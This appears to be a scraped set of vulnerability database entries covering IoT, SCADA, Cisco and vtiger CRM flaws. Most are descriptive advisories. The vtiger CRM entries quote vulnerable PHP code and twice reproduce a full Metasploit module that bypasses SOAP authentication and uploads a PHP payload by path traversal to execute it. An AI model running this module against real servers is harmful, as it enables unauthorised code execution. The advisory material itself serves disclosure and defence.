VARIoT IoT vulnerabilities database

Cisco WebEx Meetings Server does not check whether a user account is active, which allows remote authenticated users to bypass intended access restrictions by performing meeting operations after account deactivation, aka Bug ID CSCuh33315. Cisco WebEx is a web conferencing solution. An attacker can exploit this issue to bypass the authentication mechanism and gain unauthorized access to vulnerable application. This may lead to further attacks. This issue is tracked by Cisco Bug ID CSCuh33315. Cisco WebEx Meetings Server (CWMS) is a set of multi-functional conference solutions including audio, video and Web conference in Cisco's WebEx conference solution

vtiger CRM 5.4.0 and earlier contain local file-include vulnerabilities in 'customerportal.php' which allows remote attackers to view files and execute local script code. vtiger CRM Contains an injection vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. vtiger CRM is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. This may allow the attacker to compromise the application; other attacks are also possible. vtiger CRM 5.4.0 and prior are vulnerable. Vtiger CRM is a customer relationship management system (CRM) based on SugarCRM developed by American Vtiger Company. The management system provides functions such as management, collection, and analysis of customer information. The vulnerability comes from the fact that the program does not properly filter the input submitted by the user. --------------------------------------------------------------------------------- vtiger CRM <= 5.4.0 (customerportal.php) Two Local File Inclusion Vulnerabilities --------------------------------------------------------------------------------- [-] Software Link: http://www.vtiger.com/ [-] Affected Versions: [1] All versions from 5.1.0 to 5.4.0. [2] All versions from 5.2.0 to 5.4.0. [-] Vulnerability Description: 1) The vulnerable code is located in the get_list_values SOAP method defined in /soap/customerportal.php: 1528. function get_list_values($id,$module,$sessionid,$only_mine='true') 1529. { 1530. require_once('modules/'.$module.'/'.$module.'.php'); 1531. require_once('include/utils/UserInfoUtil.php'); 1532. global $adb,$log,$current_user; 1533. $log->debug("Entering customer portal function get_list_values"); 2) The vulnerable code is located in the get_project_components SOAP method defined in /soap/customerportal.php: 2778. function get_project_components($id,$module,$customerid,$sessionid) { 2779. require_once("modules/$module/$module.php"); 2780. require_once('include/utils/UserInfoUtil.php'); 2781. 2782. global $adb,$log; 2783. $log->debug("Entering customer portal function get_project_components .."); The vulnerabilities exist because these methods fail to properly validate input passed through the "module" parameter, that is being used in a call to the require_once() function (lines 1530 and 2779). This might be exploited to include arbitrary local files containing malicious PHP code. Successful exploitation of these vulnerabilities requires the application running on PHP < 5.3.4, because a null byte injection is required. [-] Solution: Apply the vendor patch:http://www.vtiger.com/blogs/?p=1467 [-] Disclosure Timeline: [13/01/2013] - Vendor notified [06/02/2013] - Vendor asked feedback abouthttp://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848 [05/03/2013] - Feedback provided to the vendor [26/03/2013] - Vendor patch released [18/04/2013] - CVE number requested [20/04/2013] - CVE number assigned [01/08/2013] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-3212 to these vulnerabilities. [-] Credits: Vulnerabilities discovered by Egidio Romano. [-] Original Advisory: http://karmainsecurity.com/KIS-2013-05

vtiger CRM 5.4.0 and earlier contain an Authentication Bypass Vulnerability due to improper authentication validation in the validateSession function. vtiger CRM Contains an authentication vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. vtiger CRM is prone to an authentication-bypass vulnerability. An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks. vtiger CRM 5.4.0 and prior are vulnerable. Vtiger CRM is a customer relationship management system (CRM) based on SugarCRM developed by American Vtiger Company. The management system provides functions such as management, collection, and analysis of customer information. [-] Vulnerability Description: The vulnerable code is located in the validateSession() function, which is defined in multiple SOAP services: function validateSession($username, $sessionid) { global $adb,$current_user; $adb->println("Inside function validateSession($username, $sessionid)"); require_once("modules/Users/Users.php"); $seed_user = new Users(); $id = $seed_user->retrieve_user_id($username); $server_sessionid = getServerSessionId($id); $adb->println("Checking Server session id and customer input session id ==> $server_sessionid == $sessionid"); if($server_sessionid == $sessionid) { $adb->println("Session id match. Authenticated to do the current operation."); return true; } else { $adb->println("Session id does not match. Not authenticated to do the current operation."); return false; } } The vulnerability exists because the "sessionid" parameter isn't properly validated before being compared with the $server_sessionid variable, which is the value returned by the getServerSessionId() function. If called with an invalid session ID, then this function will return "null", in this case the validateSession() will return "true" if the "sessionid" parameter is set to 0, "false", or "null". by calling a SOAP method without providing the "username" and "sessionid" parameters. [-] Solution: Apply the vendor patch:http://www.vtiger.com/blogs/?p=1467 [-] Disclosure Timeline: [13/01/2013] - Vendor notified [06/02/2013] - Vendor asked feedback abouthttp://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848 [05/03/2013] - Feedback provided to the vendor [26/03/2013] - Vendor patch released [18/04/2013] - CVE number requested [20/04/2013] - CVE number assigned [01/08/2013] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-3215 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Original Advisory: http://karmainsecurity.com/KIS-2013-08 . ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rexml/document' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include REXML include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload', 'Description' => %q{ vTiger CRM allows an user to bypass authentication when requesting SOAP services. In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP service. By combining both vulnerabilities an attacker can upload and execute PHP code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu 10.04 and Windows 2003 SP2. }, 'Author' => [ 'Egidio Romano', # Vulnerability discovery 'juan vazquez' # msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-3214' ], [ 'CVE', '2013-3215' ], [ 'OSVDB', '95902' ], [ 'OSVDB', '95903' ], [ 'BID', '61558' ], [ 'BID', '61559' ], [ 'EDB', '27279' ], [ 'URL', 'http://karmainsecurity.com/KIS-2013-07' ], [ 'URL', 'http://karmainsecurity.com/KIS-2013-08' ] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Payload' => { # Arbitrary big number. The payload is sent base64 encoded # into a POST SOAP request 'Space' => 262144, # 256k 'DisableNops' => true }, 'Targets' => [ [ 'vTigerCRM v5.4.0', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 26 2013')) register_options( [ OptString.new('TARGETURI', [ true, "Base vTiger CRM directory path", '/vtigercrm/']) ], self.class) end def check test_one = check_email_soap("admin", rand_text_alpha(4 + rand(4))) res = send_soap_request(test_one) unless res and res.code == 200 and res.body.to_s =~ /<return xsi:nil="true" xsi:type="xsd:string"\/>/ return Exploit::CheckCode::Unknown end test_two = check_email_soap("admin") res = send_soap_request(test_two) if res and res.code == 200 and (res.body.blank? or res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit file_name = rand_text_alpha(rand(10)+6) + '.php' php = %Q|<?php #{payload.encoded} ?>| soap = add_attachment_soap(file_name, php) res = send_soap_request(soap) print_status("#{peer} - Uploading payload...") if res and res.code == 200 and res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/ print_good("#{peer} - Upload successfully uploaded") register_files_for_cleanup(file_name) else fail_with(Failure::Unknown, "#{peer} - Upload failed") end print_status("#{peer} - Executing payload...") send_request_cgi({'uri' => normalize_uri(target_uri.path, 'soap', file_name)}, 0) end def add_attachment_soap(file_name, file_data) xml = Document.new xml.add_element( "soapenv:Envelope", { 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance", 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema", 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/", 'xmlns:crm' => "http://www.vtiger.com/products/crm" }) xml.root.add_element("soapenv:Header") xml.root.add_element("soapenv:Body") body = xml.root.elements[2] body.add_element( "crm:AddEmailAttachment", { 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" }) crm = body.elements[1] crm.add_element("emailid", {'xsi:type' => 'xsd:string'}) crm.add_element("filedata", {'xsi:type' => 'xsd:string'}) crm.add_element("filename", {'xsi:type' => 'xsd:string'}) crm.add_element("filesize", {'xsi:type' => 'xsd:string'}) crm.add_element("filetype", {'xsi:type' => 'xsd:string'}) crm.add_element("username", {'xsi:type' => 'xsd:string'}) crm.add_element("session", {'xsi:type' => 'xsd:string'}) crm.elements['emailid'].text = rand_text_alpha(4+rand(4)) crm.elements['filedata'].text = "MSF_PAYLOAD" crm.elements['filename'].text = "MSF_FILENAME" crm.elements['filesize'].text = file_data.length.to_s crm.elements['filetype'].text = "php" crm.elements['username'].text = rand_text_alpha(4+rand(4)) xml_string = xml.to_s xml_string.gsub!(/MSF_PAYLOAD/, Rex::Text.encode_base64(file_data)) xml_string.gsub!(/MSF_FILENAME/, "../../../../../../#{file_name}") return xml_string end def check_email_soap(user_name = "", session = "") xml = Document.new xml.add_element( "soapenv:Envelope", { 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance", 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema", 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/", 'xmlns:crm' => "http://www.vtiger.com/products/crm" }) xml.root.add_element("soapenv:Header") xml.root.add_element("soapenv:Body") body = xml.root.elements[2] body.add_element( "crm:CheckEmailPermission", { 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" }) crm = body.elements[1] crm.add_element("username", {'xsi:type' => 'xsd:string'}) crm.add_element("session", {'xsi:type' => 'xsd:string'}) crm.elements['username'].text = user_name crm.elements['session'].text = session xml.to_s end def send_soap_request(soap_data) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'soap', 'vtigerolservice.php'), 'method' => 'POST', 'ctype' => 'text/xml; charset=UTF-8', 'data' => soap_data }) return res end end

MiCasaVerde VeraLite with firmware 1.5.408 allows remote attackers to send HTTP requests to intranet servers via the url parameter to cgi-bin/cmh/proxy.sh, related to a Server-Side Request Forgery (SSRF) issue. MiCasaVerde VeraLite Contains a server-side request forgery vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Mi Casa Verde VeraLite is a home gateway controller device from Mi Casa Verde, Hong Kong, China. The device can control the home appliances connected to the home Wi-Fi network through a computer or mobile phone. There is a security bypass vulnerability in Mi Casa Verde VeraLite. An attacker can exploit a vulnerability to bypass specific security restrictions and perform unauthorized operations

INSTEON Hub 2242-222 lacks Web and API authentication. INSTEON Hub Contains an improper default permissions vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. The INSTEON Hub is used by users to control automatic devices in the home over the network. INSTEON Hub lacks proper validation for web interface access and API calls, allowing remote attackers to exploit the vulnerability to unauthorized control devices and perform various operations. INSTEON Hub is prone to multiple security-bypass vulnerabilities. An attacker may exploit these issues to bypass certain security restrictions and perform unauthorized actions. INSTEON Hub 2242-222 is vulnerable; other versions may also be affected

ClearSCADA is an integrated SCADA host platform that includes a rotation training engine, real-time database, web server, alarm processor and reporting software. ClearSCADA handles a WEB request with an error that allows a remote attacker to exploit a vulnerability to submit a malicious request, trigger an exception, and crash the application. ClearSCADA is prone to a denial-of-service vulnerability. An attacker can exploit this issue to trigger an exception and cause denial-of-service condition

The master-station DNP3 driver before driver19.exe, and Beta2041.exe, in IOServer allows remote attackers to cause a denial of service (infinite loop) via crafted DNP3 packets to TCP port 20000. IOServer is a Windows-based OPC server that allows OPC clients such as human-machine interfaces and monitoring and data acquisition systems to exchange factory data with programmable logic circuits. The IOServer driver does not verify or correctly verify the input on the primary server on port 20000/TCP, which can affect the control flow or database flow of the program. When an attacker can submit a special request to make the IOServer enter an infinite loop without exiting, you need to manually restart to get the normal function. Multiple IOServer drivers are prone to a remote denial-of-service vulnerability. This will result in a denial-of-service condition

Multiple SQL injection vulnerabilities in vTiger CRM 5.0.0 through 5.4.0 allow remote attackers to execute arbitrary SQL commands via the (1) picklist_name parameter in the get_picklists method to soap/customerportal.php, (2) where parameter in the get_tickets_list method to soap/customerportal.php, or (3) emailaddress parameter in the SearchContactsByEmail method to soap/vtigerolservice.php; or remote authenticated users to execute arbitrary SQL commands via the (4) emailaddress parameter in the SearchContactsByEmail method to soap/thunderbirdplugin.php. Vtiger CRM Is SQL An injection vulnerability exists.By any third party, via the following parameters SQL The command may be executed. (4) soap/thunderbirdplugin.php of SearchContactsByEmail In the method emailaddress Parameters. vtiger CRM is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. vtiger CRM 5.0.0 through versions 5.4.0 are vulnerable. Vtiger CRM is a customer relationship management system (CRM) based on SugarCRM developed by American Vtiger Company. The management system provides functions such as management, collection, and analysis of customer information. The vulnerability comes from the fact that the soap/customerportal.php script does not correctly filter the 'picklist_name' parameter in the get_picklists method; the soap/customerportal.php script does not correctly filter the get_tickets_list method The 'where' parameter; the soap/vtigerolservice.php script does not correctly filter the 'emailaddress' parameter in the SearchContactsByEmail method; the soap/thunderbirdplugin.php script does not correctly filter the 'emailaddress' parameter in the SearchContactsByEmail method. [-] Vulnerability Description: 1) The vulnerable code is located in the get_picklists SOAP method defined in /soap/customerportal.php: 1177. $id = $input_array['id']; 1178. $sessionid = $input_array['sessionid']; 1179. $picklist_name = $adb->sql_escape_string($input_array['picklist_name']); 1180. 1181. if(!validateSession($id,$sessionid)) 1182. return null; 1183. 1184. $picklist_array = Array(); 1185. 1186. $admin_role = 'H2'; 1187. $userid = getPortalUserid(); 1188. $roleres = $adb->pquery("SELECT roleid from vtiger_user2role where userid = ?", array($userid)); 1189. $RowCount = $adb->num_rows($roleres); 1190. if($RowCount > 0){ 1191. $admin_role = $adb->query_result($roleres,0,'roleid'); 1192. } 1193. 1194. $res = $adb->pquery("select vtiger_". $picklist_name.".* from vtiger_". $picklist_name." inner join [...] User input passed through the "picklist_name" parameter seems to be correctly sanitised by the sql_escape_string() method, but the vulnerability exists because it's used in the query at line 1194 without single or double quotes. This can be exploited to conduct blind SQL injection attacks. 2) The vulnerable code is located in the get_tickets_list SOAP method defined in /soap/customerportal.php: 654. $id = $input_array['id']; 655. $only_mine = $input_array['onlymine']; 656. $where = $input_array['where']; //addslashes is already added with where condition fields in portal itself 657. $match = $input_array['match']; 658. $sessionid = $input_array['sessionid']; 659. 660. if(!validateSession($id,$sessionid)) 661. return null; 662. 663. // Prepare where conditions based on search query 664. $join_type = ''; 665. $where_conditions = ''; 666. if(trim($where) != '') { 667. if($match == 'all' || $match == '') { 668. $join_type = " AND "; 669. } elseif($match == 'any') { 670. $join_type = " OR "; 671. } 672. $where = explode("&&&",$where); 673. $where_conditions = implode($join_type, $where); [...] 707. $query = "SELECT vtiger_troubletickets.*, vtiger_crmentity.smownerid,vtiger_crmentity.createdtime, [...] 708. FROM vtiger_troubletickets 709. INNER JOIN vtiger_crmentity ON vtiger_crmentity.crmid = vtiger_troubletickets.ticketid AND [...] 710. WHERE vtiger_troubletickets.parent_id IN (". generateQuestionMarks($entity_ids_list) .")"; 711. // Add conditions if there are any search parameters 712. if ($join_type != '' && $where_conditions != '') { 713. $query .= " AND (".$where_conditions.")"; 714. } User input passed through the "where" parameter isn't properly validated before being used in a SQL query at line 713. This can be exploited to conduct SQL injection attacks. 3) The vulnerable code is located in the SearchContactsByEmail SOAP method defined in /soap/thunderbirdplugin.php: 186. function SearchContactsByEmail($username,$password,$emailaddress) 187. { 188. if(authentication($username,$password)) 189. { 190. require_once('modules/Contacts/Contacts.php'); 191. 192. $seed_contact = new Contacts(); 193. $output_list = Array(); 194. 195. $response = $seed_contact->get_searchbyemailid($username,$emailaddress); User input passed through the "emailaddress" parameter isn't properly validated before being used in a call to the Contacts::get_searchbyemailid() method at line 195. This can be exploited to conduct SQL injection attacks. Successful exploitation of this vulnerability requires authentication. 4) The vulnerable code is located in the SearchContactsByEmail SOAP method defined in /soap/vtigerolservice.php: 282. function SearchContactsByEmail($username,$session,$emailaddress) 283. { 284. if(!validateSession($username,$session)) 285. return null; 286. require_once('modules/Contacts/Contacts.php'); 287. 288. $seed_contact = new Contacts(); 289. $output_list = Array(); 290. 291. $response = $seed_contact->get_searchbyemailid($username,$emailaddress); User input passed through the "emailaddress" parameter isn't properly validated before being used in a call to the Contacts::get_searchbyemailid() method at line 291. This can be exploited to conduct SQL injection attacks. Successful exploitation of this vulnerability requires knowledge of a valid username. [-] Solution: Apply the vendor patch:http://www.vtiger.com/blogs/?p=1467 [-] Disclosure Timeline: [13/01/2013] - Vendor notified [06/02/2013] - Vendor asked feedback abouthttp://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848 [05/03/2013] - Feedback provided to the vendor [26/03/2013] - Vendor patch released [18/04/2013] - CVE number requested [20/04/2013] - CVE number assigned [01/08/2013] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-3213 to these vulnerabilities. [-] Credits: Vulnerabilities discovered by Egidio Romano. [-] Original Advisory: http://karmainsecurity.com/KIS-2013-06

vtiger CRM 5.4.0 and earlier contain a PHP Code Injection Vulnerability in 'vtigerolservice.php'. vtiger CRM Contains an injection vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. vtiger CRM 5.4.0 and prior are vulnerable. Vtiger CRM is a customer relationship management system (CRM) based on SugarCRM developed by American Vtiger Company. The management system provides functions such as management, collection, and analysis of customer information. [-] Vulnerability Description: The vulnerable code is located in the AddEmailAttachment SOAP method defined in /soap/vtigerolservice.php: 458. function AddEmailAttachment($emailid,$filedata,$filename,$filesize,$filetype,$username,$session) 459. { 460. if(!validateSession($username,$session)) 461. return null; 462. global $adb; 463. require_once('modules/Users/Users.php'); 464. require_once('include/utils/utils.php'); 465. $filename = preg_replace('/\s+/', '_', $filename);//replace space with _ in filename 466. $date_var = date('Y-m-d H:i:s'); 467. 468. $seed_user = new Users(); 469. $user_id = $seed_user->retrieve_user_id($username); 470. 471. $crmid = $adb->getUniqueID("vtiger_crmentity"); 472. 473. $upload_file_path = decideFilePath(); 474. 475. $handle = fopen($upload_file_path.$crmid."_".$filename,"wb"); 476. fwrite($handle,base64_decode($filedata),$filesize); 477. fclose($handle); The vulnerability exists because this method fails to properly validate input passed through the "filedata" and "filename" parameters, which are used to write an "email attachment" in the storage directory (lines 475-477). [-] Solution: The patch provided by the vendor (http://www.vtiger.com/blogs/?p=1467) doesn't fix completely this vulnerability, because a remote authenticated user can still be able to inject and execute arbitrary code. [*] The vendor was alerted about this when the feedback has been provided. [-] Disclosure Timeline: [13/01/2013] - Vendor notified [06/02/2013] - Vendor asked feedback abouthttp://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848 [05/03/2013] - Feedback provided to the vendor [*] [26/03/2013] - Vendor patch released [18/04/2013] - CVE number requested [20/04/2013] - CVE number assigned [01/08/2013] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-3214 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Original Advisory: http://karmainsecurity.com/KIS-2013-07 . ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rexml/document' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include REXML include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload', 'Description' => %q{ vTiger CRM allows an user to bypass authentication when requesting SOAP services. In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP service. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu 10.04 and Windows 2003 SP2. }, 'Author' => [ 'Egidio Romano', # Vulnerability discovery 'juan vazquez' # msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-3214' ], [ 'CVE', '2013-3215' ], [ 'OSVDB', '95902' ], [ 'OSVDB', '95903' ], [ 'BID', '61558' ], [ 'BID', '61559' ], [ 'EDB', '27279' ], [ 'URL', 'http://karmainsecurity.com/KIS-2013-07' ], [ 'URL', 'http://karmainsecurity.com/KIS-2013-08' ] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Payload' => { # Arbitrary big number. The payload is sent base64 encoded # into a POST SOAP request 'Space' => 262144, # 256k 'DisableNops' => true }, 'Targets' => [ [ 'vTigerCRM v5.4.0', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 26 2013')) register_options( [ OptString.new('TARGETURI', [ true, "Base vTiger CRM directory path", '/vtigercrm/']) ], self.class) end def check test_one = check_email_soap("admin", rand_text_alpha(4 + rand(4))) res = send_soap_request(test_one) unless res and res.code == 200 and res.body.to_s =~ /<return xsi:nil="true" xsi:type="xsd:string"\/>/ return Exploit::CheckCode::Unknown end test_two = check_email_soap("admin") res = send_soap_request(test_two) if res and res.code == 200 and (res.body.blank? or res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit file_name = rand_text_alpha(rand(10)+6) + '.php' php = %Q|<?php #{payload.encoded} ?>| soap = add_attachment_soap(file_name, php) res = send_soap_request(soap) print_status("#{peer} - Uploading payload...") if res and res.code == 200 and res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/ print_good("#{peer} - Upload successfully uploaded") register_files_for_cleanup(file_name) else fail_with(Failure::Unknown, "#{peer} - Upload failed") end print_status("#{peer} - Executing payload...") send_request_cgi({'uri' => normalize_uri(target_uri.path, 'soap', file_name)}, 0) end def add_attachment_soap(file_name, file_data) xml = Document.new xml.add_element( "soapenv:Envelope", { 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance", 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema", 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/", 'xmlns:crm' => "http://www.vtiger.com/products/crm" }) xml.root.add_element("soapenv:Header") xml.root.add_element("soapenv:Body") body = xml.root.elements[2] body.add_element( "crm:AddEmailAttachment", { 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" }) crm = body.elements[1] crm.add_element("emailid", {'xsi:type' => 'xsd:string'}) crm.add_element("filedata", {'xsi:type' => 'xsd:string'}) crm.add_element("filename", {'xsi:type' => 'xsd:string'}) crm.add_element("filesize", {'xsi:type' => 'xsd:string'}) crm.add_element("filetype", {'xsi:type' => 'xsd:string'}) crm.add_element("username", {'xsi:type' => 'xsd:string'}) crm.add_element("session", {'xsi:type' => 'xsd:string'}) crm.elements['emailid'].text = rand_text_alpha(4+rand(4)) crm.elements['filedata'].text = "MSF_PAYLOAD" crm.elements['filename'].text = "MSF_FILENAME" crm.elements['filesize'].text = file_data.length.to_s crm.elements['filetype'].text = "php" crm.elements['username'].text = rand_text_alpha(4+rand(4)) xml_string = xml.to_s xml_string.gsub!(/MSF_PAYLOAD/, Rex::Text.encode_base64(file_data)) xml_string.gsub!(/MSF_FILENAME/, "../../../../../../#{file_name}") return xml_string end def check_email_soap(user_name = "", session = "") xml = Document.new xml.add_element( "soapenv:Envelope", { 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance", 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema", 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/", 'xmlns:crm' => "http://www.vtiger.com/products/crm" }) xml.root.add_element("soapenv:Header") xml.root.add_element("soapenv:Body") body = xml.root.elements[2] body.add_element( "crm:CheckEmailPermission", { 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" }) crm = body.elements[1] crm.add_element("username", {'xsi:type' => 'xsd:string'}) crm.add_element("session", {'xsi:type' => 'xsd:string'}) crm.elements['username'].text = user_name crm.elements['session'].text = session xml.to_s end def send_soap_request(soap_data) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'soap', 'vtigerolservice.php'), 'method' => 'POST', 'ctype' => 'text/xml; charset=UTF-8', 'data' => soap_data }) return res end end

Radio Thermostat CT80 And CT50 with firmware 1.4.64 and earlier does not restrict access to the API, which allows remote attackers to change the operation mode, wifi connection settings, temperature thresholds, and other settings via unspecified vectors. The Radio Thermostat CT80 and CT50 are temperature controlled via WiFi. An attacker may leverage this issue to bypass certain security restrictions and perform unauthorized actions. Radio Thermostat CT80 and CT50 running versions 1.4.64 and prior are vulnerable. This product manages heating and cooling systems in homes

Cross-site request forgery (CSRF) vulnerability in Siemens WinCC (TIA Portal) 11 and 12 before 12 SP1 allows remote attackers to hijack the authentication of unspecified victims by leveraging improper configuration of SIMATIC HMI panels by the WinCC product. Based on the Windows platform, Siemens SIMATIC WinCC provides complete monitoring and data acquisition (SCADA) functionality for the industrial sector, from single-user systems to multi-user systems supporting redundant servers and remote web client solutions. Siemens SIMATIC WinCC TIA Portal is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. Siemens SIMATIC WinCC TIA Portal prior to 12SP1 are vulnerable. The software enables fast and intuitive development and commissioning of automation systems. A remote attacker can exploit this vulnerability to hijack user authentication through incorrectly configured SIMATIC HMI panels of WinCC products

Open redirect vulnerability in Siemens WinCC (TIA Portal) 11 and 12 before 12 SP1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks by leveraging improper configuration of SIMATIC HMI panels by the WinCC product. Based on the Windows platform, Siemens SIMATIC WinCC provides complete monitoring and data acquisition (SCADA) functionality for the industrial sector, from single-user systems to multi-user systems supporting redundant servers and remote web client solutions. Siemens SIMATIC WinCC TIA Portal is prone to a remote URL-redirection vulnerability. An attacker can leverage this issue by constructing a URI that includes a malicious site redirection. When an unsuspecting victim follows the URI, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Siemens SIMATIC WinCC TIA Portal prior to 12SP1 are vulnerable. The software enables fast and intuitive development and commissioning of automation systems

The Cisco VC220 and VC240 cameras allow remote attackers to cause a denial of service (WebUI outage) via crafted packets, aka Bug IDs CSCtf73188, CSCtf88059, CSCtf87951, CSCtf87908, and CSCtf88019. Cisco VC220 and VC240 Camera has a service disruption (WebUI Stop ) There are vulnerabilities that are put into a state. Vendors have confirmed this vulnerability Bug ID CSCtf73188 , CSCtf88059 , CSCtf87951 , CSCtf87908 ,and CSCtf88019 It is released as.Denial of service operation via a packet crafted by a third party (WebUI Stop ) There is a possibility of being put into a state. The Cisco VC220 and VC240 devices are network cameras. After successful use, an unauthenticated remote attacker can send a specially-made packet to the affected device, causing the affected device to reload, preventing the WebUI from accessing the camera, and denying the legitimate user. These issues are being tracked by Cisco Bug IDs CSCtf73188, CSCtf88059, CSCtf87951, CSCtf87908, and CSCtf88019. A remote attacker can exploit this vulnerability to cause a denial of service (WebUI interruption)

The web service framework in Cisco WAAS Software 4.x and 5.x before 5.0.3e, 5.1.x before 5.1.1c, and 5.2.x before 5.2.1 in a Central Manager (CM) configuration allows remote attackers to execute arbitrary code via a crafted POST request, aka Bug ID CSCuh26626. Vendors have confirmed this vulnerability Bug ID CSCuh26626 It is released as.Skillfully crafted by a third party POST Arbitrary code may be executed via a request. Cisco Wide Area Application Services is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. This issue is being tracked by Cisco bug ID CSCuh26626. This software is mainly used in the link environment with small bandwidth and large delay. Cisco WAAS Software 4.x, Cisco WAAS Software 5.x prior to 5.0.3e, Cisco WAAS Software 5.1.x prior to 5.1.1c, Cisco WAAS Software 5.2.x prior to 5.2.1 are affected

The web framework in Cisco WAAS Software before 4.x and 5.x before 5.0.3e, 5.1.x before 5.1.1c, and 5.2.x before 5.2.1; Cisco ACNS Software 4.x and 5.x before 5.5.29.2; Cisco ECDS Software 2.x before 2.5.6; Cisco CDS-IS Software 2.x before 2.6.3.b50 and 3.1.x before 3.1.2b54; Cisco VDS-IS Software 3.2.x before 3.2.1.b9; Cisco VDS-SB Software 1.x before 1.1.0-b96; Cisco VDS-OE Software 1.x before 1.0.1; and Cisco VDS-OS Software 1.x in central-management mode allows remote authenticated users to execute arbitrary commands by appending crafted strings to values in GUI fields, aka Bug IDs CSCug40609, CSCug48855, CSCug48921, CSCug48872, CSCuh21103, CSCuh21020, and CSCug56790. plural Cisco Product Web Framework central management mode (central-management mode) Contains a vulnerability that allows arbitrary command execution. Vendors have confirmed this vulnerability Bug ID CSCug40609 , CSCug48855 , CSCug48921 , CSCug48872 , CSCuh21103 , CSCuh21020 ,and CSCug56790 It is released as.By a remotely authenticated user GUI An arbitrary command may be executed by adding a specially crafted string to the field value. Multiple Cisco Content Network and Video Delivery products are prone to a remote command-injection vulnerability because it fails to properly sanitize user-supplied input. Successfully exploiting this issue may allow an unprivileged attacker to execute arbitrary commands on the affected system and completely compromise the affected devices. This issue is being tracked by Cisco bug IDs CSCug40609, CSCug48855, CSCug48921, CSCug48872, CSCuh21103, CSCuh21020, and CSCug56790. Cisco Wide Area Application Services (WAAS) is a set of WAN link acceleration software from Cisco. This software is mainly used in the link environment with small bandwidth and large delay

